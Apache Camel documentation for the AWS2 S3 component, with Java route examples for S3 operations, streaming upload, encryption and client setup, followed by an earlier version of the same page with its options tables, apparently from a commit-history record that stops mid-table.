\n=== S3 Producer Operation examples\n\n- Single Upload: this operation will upload a file to S3 based on the body content\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(AWS2S3Constants.KEY, \"camel.txt\");\n exchange.getIn().setBody(\"Camel rocks!\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will upload the file camel.txt with the content \"Camel rocks!\" to the mycamelbucket bucket\n\n- Multipart Upload: this operation will perform a multipart upload of a file to S3 based on the body content\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(AWS2S3Constants.KEY, \"empty.txt\");\n exchange.getIn().setBody(new File(\"src\/empty.txt\"));\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&multiPartUpload=true&autoCreateBucket=true&partSize=1048576\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will perform a multipart upload of the file empty.txt, based on the content of the file src\/empty.txt, to the mycamelbucket bucket\n\n- CopyObject: this operation copies an object from one bucket to a different one\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(AWS2S3Constants.BUCKET_DESTINATION_NAME, \"camelDestinationBucket\");\n exchange.getIn().setHeader(AWS2S3Constants.KEY, \"camelKey\");\n exchange.getIn().setHeader(AWS2S3Constants.DESTINATION_KEY, \"camelDestinationKey\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=copyObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will copy the object camelKey from the bucket mycamelbucket to the camelDestinationBucket bucket, under the destination key camelDestinationKey.\n\n- DeleteObject: this operation deletes an object from a bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(AWS2S3Constants.KEY, \"camelKey\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=deleteObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will delete the object camelKey from the bucket mycamelbucket.\n\n- ListBuckets: this operation lists the buckets for this account in this region\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=listBuckets\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will list the buckets for this account\n\n- DeleteBucket: this operation deletes the bucket specified as URI parameter or header\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=deleteBucket\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will delete the bucket mycamelbucket\n\n- ListObjects: this operation lists the objects in a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=listObjects\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will list the objects in the mycamelbucket bucket\n\n- GetObject: this operation gets a single object from a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(AWS2S3Constants.KEY, \"camelKey\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=getObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return an S3Object instance related to the camelKey object in the mycamelbucket bucket.\n\n- GetObjectRange: this operation gets a single object range from a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(AWS2S3Constants.KEY, \"camelKey\");\n exchange.getIn().setHeader(AWS2S3Constants.RANGE_START, \"0\");\n exchange.getIn().setHeader(AWS2S3Constants.RANGE_END, \"9\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=getObjectRange\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return an S3Object instance related to the camelKey object in the mycamelbucket bucket, containing the bytes from 0 to 9.\n\n- CreateDownloadLink: this operation will return a download link through S3 
Presigner\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(AWS2S3Constants.KEY, \"camelKey\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?accessKey=xxx&secretKey=yyy&region=region&operation=createDownloadLink\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return a download link URL for the file camelKey in the bucket mycamelbucket and the given region\n\n== Streaming Upload mode\n\nWith the stream mode enabled, users will be able to upload data to S3 without knowing the size of the data ahead of time, by leveraging multipart upload.\nThe upload will be completed when either the batchSize or the batchMessageNumber has been reached.\nThere are two possible naming strategies: progressive and random. With the progressive strategy each file name is composed of the keyName option, a progressive counter and, if present, the file extension, while with the random strategy a UUID will be added after the keyName and, if present, the file extension will be appended.\n\nAs an example:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(kafka(\"topic1\").brokers(\"localhost:9092\"))\n .log(\"Kafka Message is: ${body}\")\n .to(aws2S3(\"camel-bucket\").streamingUploadMode(true).batchMessageNumber(25).namingStrategy(AWS2S3EndpointBuilderFactory.AWSS3NamingStrategyEnum.progressive).keyName(\"{{kafkaTopic1}}\/{{kafkaTopic1}}.txt\"));\n\nfrom(kafka(\"topic2\").brokers(\"localhost:9092\"))\n .log(\"Kafka Message is: ${body}\")\n .to(aws2S3(\"camel-bucket\").streamingUploadMode(true).batchMessageNumber(25).namingStrategy(AWS2S3EndpointBuilderFactory.AWSS3NamingStrategyEnum.progressive).keyName(\"{{kafkaTopic2}}\/{{kafkaTopic2}}.txt\"));\n--------------------------------------------------------------------------------\n\nThe default size for a batch is 1 MB, but you can adjust it according to your requirements.\n\nWhen you stop your producer route, the producer will take care of flushing the remaining buffered messages and completing the upload.\n\nIn streaming upload you'll be able to restart the producer from the point where it left off. It's important to note that this feature is relevant only when using the progressive naming strategy.\n\nBy setting the restartingPolicy to lastPart, you will restart uploading files and contents from the last part number the producer left.\n\nAs an example: \n - Start the route with the progressive naming strategy and keyName equal to camel.txt, with batchMessageNumber equal to 20, and restartingPolicy equal to lastPart\n - Send 70 messages.\n - Stop the route\n - On your S3 bucket you should now see 4 files: camel.txt, camel-1.txt, camel-2.txt and camel-3.txt; the first three will have 20 messages, while the last one only 10.\n - Restart the route\n - Send 25 messages\n - Stop the route\n - You'll now have 2 other files in your bucket: camel-5.txt and camel-6.txt, the first with 20 messages and the second with 5 messages.\n - And so on\n\nThis won't be needed when using the random naming strategy.\n\nOn the opposite, you can specify the override restartingPolicy. In that case you'll be able to override whatever you wrote before (for that particular keyName) on your bucket.\n
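\nFor illustration only (the bucket name and batch values here are hypothetical), a producer route matching the walkthrough above could be configured like this:\n\n[source,java]\n--------------------------------------------------------------------------------\n\/\/ Progressive naming plus restartingPolicy=lastPart: after a restart the\n\/\/ producer resumes from the last part number instead of starting over.\nfrom(\"direct:stream\")\n    .to(\"aws2-s3:\/\/camel-bucket?streamingUploadMode=true&batchMessageNumber=20\"\n        + \"&namingStrategy=progressive&restartingPolicy=lastPart&keyName=camel.txt\");\n--------------------------------------------------------------------------------\n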
\n[NOTE]\n====\nIn Streaming upload mode the only keyName option that will be taken into account is the endpoint option. Using the header will throw an NPE, and this is done by design.\nSetting the header would potentially change the file name on each exchange, and this is against the aim of the streaming upload producer. The keyName needs to be fixed and static. \nThe selected naming strategy will do the rest of the work.\n====\n\n== Bucket Autocreation\n\nWith the option `autoCreateBucket` users can enable or disable the autocreation of an S3 bucket in case it doesn't exist; see the options tables above for its default value.\nIf set to false, any operation on a non-existent bucket in AWS won't be successful and an error will be returned.\n\n== Moving stuff between one bucket and another bucket\n\nSome users like to consume stuff from a bucket and move the content to a different one without using the copyObject feature of this component.\nIf this is the case for you, don't forget to remove the bucketName header from the incoming exchange of the consumer; otherwise the file will always be overwritten in the same\noriginal bucket.\n
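\nA minimal sketch of this pattern (the bucket names are illustrative): removing the bucket-name header lets the producer endpoint resolve its own bucket instead of reusing the incoming one.\n\n[source,java]\n--------------------------------------------------------------------------------\n\/\/ Drop CamelAwsS3BucketName from the consumed exchange so the file is written\n\/\/ to the producer endpoint's bucket rather than back to the original one.\nfrom(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client\")\n    .removeHeader(AWS2S3Constants.BUCKET_NAME)\n    .to(\"aws2-s3:\/\/mydestinationbucket?amazonS3Client=#amazonS3Client\");\n--------------------------------------------------------------------------------\n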
\n== MoveAfterRead consumer option\n\nIn addition to deleteAfterRead, another option has been added: moveAfterRead. With this option enabled, the consumed object will be moved to a target destinationBucket instead of being only deleted.\nThis will require specifying the destinationBucket option. As an example:\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&moveAfterRead=true&destinationBucket=myothercamelbucket\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nIn this case the objects consumed will be moved to the myothercamelbucket bucket and deleted from the original one (because deleteAfterRead is set to true by default).\n\nYou also have the possibility of using a key prefix\/suffix while moving the file to a different bucket. The options are destinationBucketPrefix and destinationBucketSuffix.\n\nTaking the above example, you could do something like:\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&moveAfterRead=true&destinationBucket=myothercamelbucket&destinationBucketPrefix=RAW(pre-)&destinationBucketSuffix=RAW(-suff)\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nIn this case, too, the objects consumed will be moved to the myothercamelbucket bucket and deleted from the original one (because deleteAfterRead is set to true by default).\n\nSo if the file name is test, in myothercamelbucket you should see a file called pre-test-suff.\n\n== Using customer key as encryption\n\nWe also introduced customer key support (an alternative to using KMS). The following code shows an example.\n\n[source,java]\n--------------------------------------------------------------------------------\nString key = UUID.randomUUID().toString();\nbyte[] secretKey = generateSecretKey();\nString b64Key = Base64.getEncoder().encodeToString(secretKey);\nString b64KeyMd5 = Md5Utils.md5AsBase64(secretKey);\n\nString awsEndpoint = \"aws2-s3:\/\/mycamel?autoCreateBucket=false&useCustomerKey=true&customerKeyId=RAW(\" + b64Key + \")&customerKeyMD5=RAW(\" + b64KeyMd5 + \")&customerAlgorithm=\" + AES256.name();\n\nfrom(\"direct:putObject\")\n .setHeader(AWS2S3Constants.KEY, constant(\"test.txt\"))\n .setBody(constant(\"Test\"))\n .to(awsEndpoint);\n--------------------------------------------------------------------------------\n\n== Using a POJO as body\n\nSometimes building an AWS request can be complex because of multiple options. We introduced the possibility to use a POJO as the body.\nIn AWS S3 there are multiple operations you can submit; as an example, for a ListObjects request you can do something like:\n\n[source,java]\n------------------------------------------------------------------------------------------------------\nfrom(\"direct:aws2-s3\")\n .setBody(ListObjectsRequest.builder().bucket(bucketName).build())\n .to(\"aws2-s3:\/\/test?amazonS3Client=#amazonS3Client&operation=listObjects&pojoRequest=true\")\n------------------------------------------------------------------------------------------------------\n\nIn this way you pass the request directly, without the need to pass headers and options specifically related to this operation.\n\n== Create S3 client and add component to registry\nSometimes you may want to perform some advanced configuration using AWS2S3Configuration, which also allows you to set the S3 client.\nYou can create and set the S3 client in the component configuration as shown in the following example:\n\n[source,java]\n--------------------------------------------------------------------------------\nString awsBucketAccessKey = \"your_access_key\";\nString awsBucketSecretKey = \"your_secret_key\";\n\nS3Client s3Client = S3Client.builder().credentialsProvider(StaticCredentialsProvider.create(AwsBasicCredentials.create(awsBucketAccessKey, awsBucketSecretKey)))\n .region(Region.US_EAST_1).build();\n\nAWS2S3Configuration configuration = new AWS2S3Configuration();\nconfiguration.setAmazonS3Client(s3Client);\nconfiguration.setAutoDiscoverClient(true);\nconfiguration.setBucketName(\"s3bucket2020\");\nconfiguration.setRegion(\"us-east-1\");\n--------------------------------------------------------------------------------\n\nNow you can configure the S3 component (using the configuration object created above) and add it to the registry in the\nconfigure method before initialization of routes.\n\n[source,java]\n--------------------------------------------------------------------------------\nAWS2S3Component s3Component = new AWS2S3Component(getContext());\ns3Component.setConfiguration(configuration);\ns3Component.setLazyStartProducer(true);\ncamelContext.addComponent(\"aws2-s3\", s3Component);\n--------------------------------------------------------------------------------\n\nNow your component will be used for all the operations implemented in camel routes.\n
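\nFor illustration, once registered the component can be used from a route like any other (the key and body here are hypothetical):\n\n[source,java]\n--------------------------------------------------------------------------------\n\/\/ Uses the \"aws2-s3\" component registered above, with its pre-configured client.\nfrom(\"direct:putObject\")\n    .setHeader(AWS2S3Constants.KEY, constant(\"test.txt\"))\n    .setBody(constant(\"Camel rocks!\"))\n    .to(\"aws2-s3:\/\/s3bucket2020\");\n--------------------------------------------------------------------------------\n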
\n== Dependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n    <groupId>org.apache.camel<\/groupId>\n    <artifactId>camel-aws2-s3<\/artifactId>\n    <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version}` must be replaced by the actual version of Camel.\n\n\ninclude::{page-component-version}@camel-spring-boot::page$aws2-s3-starter.adoc[]\n","old_contents":"[[aws2-s3-component]]\n= AWS S3 Storage Service Component\n\/\/THIS FILE IS COPIED: EDIT THE SOURCE FILE:\n:page-source: components\/camel-aws\/camel-aws2-s3\/src\/main\/docs\/aws2-s3-component.adoc\n:docTitle: AWS S3 Storage Service\n:artifactId: camel-aws2-s3\n:description: Store and retrieve objects from AWS S3 Storage Service using AWS SDK version 2.x.\n:since: 3.2\n:supportLevel: Stable\n:component-header: Both producer and consumer are supported\ninclude::{cq-version}@camel-quarkus:ROOT:partial$reference\/components\/aws2-s3.adoc[opts=optional]\n\/\/Manually maintained attributes\n:group: AWS\n\n*Since Camel {since}*\n\n*{component-header}*\n\nThe AWS2 S3 component supports storing and retrieving objects from\/to\nhttps:\/\/aws.amazon.com\/s3[Amazon's S3] service.\n\nPrerequisites\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon S3. More information is available at\nhttps:\/\/aws.amazon.com\/s3[Amazon S3].\n\n== URI Format\n\n------------------------------\naws2-s3:\/\/bucketNameOrArn[?options]\n------------------------------\n\nThe bucket will be created if it doesn't already exist. +\n You can append query options to the URI in the following format:\n?options=value&option2=value&...\n\n\n\/\/ component-configure options: START\n== Configuring Options\n\nCamel components are configured on two separate levels:\n\n- component level\n- endpoint level\n\n=== Configuring Component Options\n\nThe component level is the highest level, which holds general and common configurations that are inherited by the endpoints.\nFor example a component may have security settings, credentials for authentication, urls for network connection and so forth.\n\nSome components only have a few options, and others may have many. Because components typically have pre-configured defaults\nthat are commonly used, you may often only need to configure a few options on a component; or none at all.\n\nConfiguring components can be done with the xref:latest@manual::component-dsl.adoc[Component DSL],\nin a configuration file (application.properties|yaml), or directly with Java code.\n\n=== Configuring Endpoint Options\n\nWhere you find yourself configuring the most is on endpoints, as endpoints often have many options, which allows you to\nconfigure what you need the endpoint to do. The options are also categorized into whether the endpoint is used as consumer (from)\nor as a producer (to), or used for both.\n\nConfiguring endpoints is most often done directly in the endpoint URI as path and query parameters. 
You can also use\nthe xref:latest@manual::Endpoint-dsl.adoc[Endpoint DSL] as a _type safe_ way of configuring endpoints.\n\nA good practice when configuring options is to use xref:latest@manual::using-propertyplaceholder.adoc[Property Placeholders],\nwhich allows to not hardcode urls, port numbers, sensitive information, and other settings.\nIn other words placeholders allows to externalize the configuration from your code, and gives more flexibility and reuse.\n\nThe following two sections lists all the options, firstly for the component followed by the endpoint.\n\/\/ component-configure options: END\n\n\/\/ component options: START\n== Component Options\n\n\nThe AWS S3 Storage Service component supports 50 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *amazonS3Client* (common) | *Autowired* Reference to a com.amazonaws.services.s3.AmazonS3 in the registry. | | S3Client\n| *amazonS3Presigner* (common) | *Autowired* An S3 Presigner for Request, used mainly in createDownloadLink operation | | S3Presigner\n| *autoCreateBucket* (common) | Setting the autocreation of the S3 bucket bucketName. This will apply also in case of moveAfterRead option enabled and it will create the destinationBucket if it doesn't exist already. | false | boolean\n| *configuration* (common) | The component configuration | | AWS2S3Configuration\n| *overrideEndpoint* (common) | Set the need for overidding the endpoint. This option needs to be used in combination with uriEndpointOverride option | false | boolean\n| *pojoRequest* (common) | If we want to use a POJO request as body or not | false | boolean\n| *policy* (common) | The policy for this queue to set in the com.amazonaws.services.s3.AmazonS3#setBucketPolicy() method. | | String\n| *proxyHost* (common) | To define a proxy host when instantiating the SQS client | | String\n| *proxyPort* (common) | Specify a proxy port to be used inside the client definition. | | Integer\n| *proxyProtocol* (common) | To define a proxy protocol when instantiating the S3 client. There are 2 enums and the value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *region* (common) | The region in which S3 client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1) You'll need to use the name Region.EU_WEST_1.id() | | String\n| *trustAllCertificates* (common) | If we want to trust all certificates in case of overriding the endpoint | false | boolean\n| *uriEndpointOverride* (common) | Set the overriding uri endpoint. This option needs to be used in combination with overrideEndpoint option | | String\n| *useDefaultCredentialsProvider* (common) | Set whether the S3 client should expect to load credentials through a default credentials provider or to expect static credentials to be passed in. | false | boolean\n| *customerAlgorithm* (common) | Define the customer algorithm to use in case CustomerKey is enabled | | String\n| *customerKeyId* (common) | Define the id of Customer key to use in case CustomerKey is enabled | | String\n| *customerKeyMD5* (common) | Define the MD5 of Customer key to use in case CustomerKey is enabled | | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. 
By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *deleteAfterRead* (consumer) | Delete objects from S3 after they have been retrieved. The delete is only performed if the Exchange is committed. If a rollback occurs, the object is not deleted. If this option is false, then the same objects will be retrieve over and over again on the polls. Therefore you need to use the Idempotent Consumer EIP in the route to filter out duplicates. You can filter using the AWS2S3Constants#BUCKET_NAME and AWS2S3Constants#KEY headers, or only the AWS2S3Constants#KEY header. | true | boolean\n| *delimiter* (consumer) | The delimiter which is used in the com.amazonaws.services.s3.model.ListObjectsRequest to only consume objects we are interested in. | | String\n| *destinationBucket* (consumer) | Define the destination bucket where an object must be moved when moveAfterRead is set to true. | | String\n| *destinationBucketPrefix* (consumer) | Define the destination bucket prefix to use when an object must be moved and moveAfterRead is set to true. | | String\n| *destinationBucketSuffix* (consumer) | Define the destination bucket suffix to use when an object must be moved and moveAfterRead is set to true. | | String\n| *doneFileName* (consumer) | If provided, Camel will only consume files if a done file exists. | | String\n| *fileName* (consumer) | To get the object from the bucket with the given file name | | String\n| *ignoreBody* (consumer) | If it is true, the S3 Object Body will be ignored completely, if it is set to false the S3 Object will be put in the body. Setting this to true, will override any behavior defined by includeBody option. | false | boolean\n| *includeBody* (consumer) | If it is true, the S3Object exchange will be consumed and put into the body and closed. If false the S3Object stream will be put raw into the body and the headers will be set with the S3 object metadata. This option is strongly related to autocloseBody option. In case of setting includeBody to true because the S3Object stream will be consumed then it will also be closed, while in case of includeBody false then it will be up to the caller to close the S3Object stream. However setting autocloseBody to true when includeBody is false it will schedule to close the S3Object stream automatically on exchange completion. | true | boolean\n| *includeFolders* (consumer) | If it is true, the folders\/directories will be consumed. If it is false, they will be ignored, and Exchanges will not be created for those | true | boolean\n| *moveAfterRead* (consumer) | Move objects from S3 bucket to a different bucket after they have been retrieved. To accomplish the operation the destinationBucket option must be set. The copy bucket operation is only performed if the Exchange is committed. If a rollback occurs, the object is not moved. | false | boolean\n| *prefix* (consumer) | The prefix which is used in the com.amazonaws.services.s3.model.ListObjectsRequest to only consume objects we are interested in. | | String\n| *autocloseBody* (consumer) | If this option is true and includeBody is false, then the S3Object.close() method will be called on exchange completion. This option is strongly related to includeBody option. In case of setting includeBody to false and autocloseBody to false, it will be up to the caller to close the S3Object stream. Setting autocloseBody to true, will close the S3Object stream automatically. 
| true | boolean\n| *batchMessageNumber* (producer) | The number of messages composing a batch in streaming upload mode | 10 | int\n| *batchSize* (producer) | The batch size (in bytes) in streaming upload mode | 1000000 | int\n| *deleteAfterWrite* (producer) | Delete file object after the S3 file has been uploaded | false | boolean\n| *keyName* (producer) | Setting the key name for an element in the bucket through endpoint parameter | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *multiPartUpload* (producer) | If it is true, camel will upload the file with multi part format, the part size is decided by the option of partSize | false | boolean\n| *namingStrategy* (producer) | The naming strategy to use in streaming upload mode. There are 2 enums and the value can be one of: progressive, random | progressive | AWSS3NamingStrategyEnum\n| *operation* (producer) | The operation to do in case the user don't want to do only an upload. There are 8 enums and the value can be one of: copyObject, listObjects, deleteObject, deleteBucket, listBuckets, getObject, getObjectRange, createDownloadLink | | AWS2S3Operations\n| *partSize* (producer) | Setup the partSize which is used in multi part upload, the default size is 25M. | 26214400 | long\n| *restartingPolicy* (producer) | The restarting policy to use in streaming upload mode. There are 2 enums and the value can be one of: override, lastPart | override | AWSS3RestartingPolicyEnum\n| *storageClass* (producer) | The storage class to set in the com.amazonaws.services.s3.model.PutObjectRequest request. | | String\n| *streamingUploadMode* (producer) | When stream mode is true the upload to bucket will be done in streaming | false | boolean\n| *streamingUploadTimeout* (producer) | While streaming upload mode is true, this option set the timeout to complete upload | | long\n| *awsKMSKeyId* (producer) | Define the id of KMS key to use in case KMS is enabled | | String\n| *useAwsKMS* (producer) | Define if KMS must be used or not | false | boolean\n| *useCustomerKey* (producer) | Define if Customer Key must be used or not | false | boolean\n| *autowiredEnabled* (advanced) | Whether autowiring is enabled. This is used for automatic autowiring options (the option must be marked as autowired) by looking up in the registry to find if there is a single instance of matching type, which then gets configured on the component. This can be used for automatic configuring JDBC data sources, JMS connection factories, AWS Clients, etc. 
| true | boolean\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ component options: END\n\n\/\/ endpoint options: START\n== Endpoint Options\n\nThe AWS S3 Storage Service endpoint is configured using URI syntax:\n\n----\naws2-s3:\/\/bucketNameOrArn\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bucketNameOrArn* | *Required* Bucket name or ARN | | String\n|===\n\n\n=== Query Parameters (68 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *amazonS3Client* (common) | *Autowired* Reference to a com.amazonaws.services.s3.AmazonS3 in the registry. | | S3Client\n| *amazonS3Presigner* (common) | *Autowired* An S3 Presigner for Request, used mainly in createDownloadLink operation | | S3Presigner\n| *autoCreateBucket* (common) | Setting the autocreation of the S3 bucket bucketName. This will apply also in case of moveAfterRead option enabled and it will create the destinationBucket if it doesn't exist already. | false | boolean\n| *overrideEndpoint* (common) | Set the need for overidding the endpoint. This option needs to be used in combination with uriEndpointOverride option | false | boolean\n| *pojoRequest* (common) | If we want to use a POJO request as body or not | false | boolean\n| *policy* (common) | The policy for this queue to set in the com.amazonaws.services.s3.AmazonS3#setBucketPolicy() method. | | String\n| *proxyHost* (common) | To define a proxy host when instantiating the SQS client | | String\n| *proxyPort* (common) | Specify a proxy port to be used inside the client definition. | | Integer\n| *proxyProtocol* (common) | To define a proxy protocol when instantiating the S3 client. There are 2 enums and the value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *region* (common) | The region in which S3 client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1) You'll need to use the name Region.EU_WEST_1.id() | | String\n| *trustAllCertificates* (common) | If we want to trust all certificates in case of overriding the endpoint | false | boolean\n| *uriEndpointOverride* (common) | Set the overriding uri endpoint. This option needs to be used in combination with overrideEndpoint option | | String\n| *useDefaultCredentialsProvider* (common) | Set whether the S3 client should expect to load credentials through a default credentials provider or to expect static credentials to be passed in. | false | boolean\n| *customerAlgorithm* (common) | Define the customer algorithm to use in case CustomerKey is enabled | | String\n| *customerKeyId* (common) | Define the id of Customer key to use in case CustomerKey is enabled | | String\n| *customerKeyMD5* (common) | Define the MD5 of Customer key to use in case CustomerKey is enabled | | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. 
| false | boolean\n| *deleteAfterRead* (consumer) | Delete objects from S3 after they have been retrieved. The delete is only performed if the Exchange is committed. If a rollback occurs, the object is not deleted. If this option is false, then the same objects will be retrieve over and over again on the polls. Therefore you need to use the Idempotent Consumer EIP in the route to filter out duplicates. You can filter using the AWS2S3Constants#BUCKET_NAME and AWS2S3Constants#KEY headers, or only the AWS2S3Constants#KEY header. | true | boolean\n| *delimiter* (consumer) | The delimiter which is used in the com.amazonaws.services.s3.model.ListObjectsRequest to only consume objects we are interested in. | | String\n| *destinationBucket* (consumer) | Define the destination bucket where an object must be moved when moveAfterRead is set to true. | | String\n| *destinationBucketPrefix* (consumer) | Define the destination bucket prefix to use when an object must be moved and moveAfterRead is set to true. | | String\n| *destinationBucketSuffix* (consumer) | Define the destination bucket suffix to use when an object must be moved and moveAfterRead is set to true. | | String\n| *doneFileName* (consumer) | If provided, Camel will only consume files if a done file exists. | | String\n| *fileName* (consumer) | To get the object from the bucket with the given file name | | String\n| *ignoreBody* (consumer) | If it is true, the S3 Object Body will be ignored completely, if it is set to false the S3 Object will be put in the body. Setting this to true, will override any behavior defined by includeBody option. | false | boolean\n| *includeBody* (consumer) | If it is true, the S3Object exchange will be consumed and put into the body and closed. If false the S3Object stream will be put raw into the body and the headers will be set with the S3 object metadata. This option is strongly related to autocloseBody option. In case of setting includeBody to true because the S3Object stream will be consumed then it will also be closed, while in case of includeBody false then it will be up to the caller to close the S3Object stream. However setting autocloseBody to true when includeBody is false it will schedule to close the S3Object stream automatically on exchange completion. | true | boolean\n| *includeFolders* (consumer) | If it is true, the folders\/directories will be consumed. If it is false, they will be ignored, and Exchanges will not be created for those | true | boolean\n| *maxConnections* (consumer) | Set the maxConnections parameter in the S3 client configuration | 60 | int\n| *maxMessagesPerPoll* (consumer) | Gets the maximum number of messages as a limit to poll at each polling. Gets the maximum number of messages as a limit to poll at each polling. The default value is 10. Use 0 or a negative number to set it as unlimited. | 10 | int\n| *moveAfterRead* (consumer) | Move objects from S3 bucket to a different bucket after they have been retrieved. To accomplish the operation the destinationBucket option must be set. The copy bucket operation is only performed if the Exchange is committed. If a rollback occurs, the object is not moved. | false | boolean\n| *prefix* (consumer) | The prefix which is used in the com.amazonaws.services.s3.model.ListObjectsRequest to only consume objects we are interested in. | | String\n| *sendEmptyMessageWhenIdle* (consumer) | If the polling consumer did not poll any files, you can enable this option to send an empty message (no body) instead. 
| false | boolean\n| *autocloseBody* (consumer) | If this option is true and includeBody is false, then the S3Object.close() method will be called on exchange completion. This option is strongly related to includeBody option. In case of setting includeBody to false and autocloseBody to false, it will be up to the caller to close the S3Object stream. Setting autocloseBody to true, will close the S3Object stream automatically. | true | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. There are 3 enums and the value can be one of: InOnly, InOut, InOptionalOut | | ExchangePattern\n| *pollStrategy* (consumer) | A pluggable org.apache.camel.PollingConsumerPollingStrategy allowing you to provide your custom implementation to control error handling usually occurred during the poll operation before an Exchange have been created and being routed in Camel. | | PollingConsumerPollStrategy\n| *batchMessageNumber* (producer) | The number of messages composing a batch in streaming upload mode | 10 | int\n| *batchSize* (producer) | The batch size (in bytes) in streaming upload mode | 1000000 | int\n| *deleteAfterWrite* (producer) | Delete file object after the S3 file has been uploaded | false | boolean\n| *keyName* (producer) | Setting the key name for an element in the bucket through endpoint parameter | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and 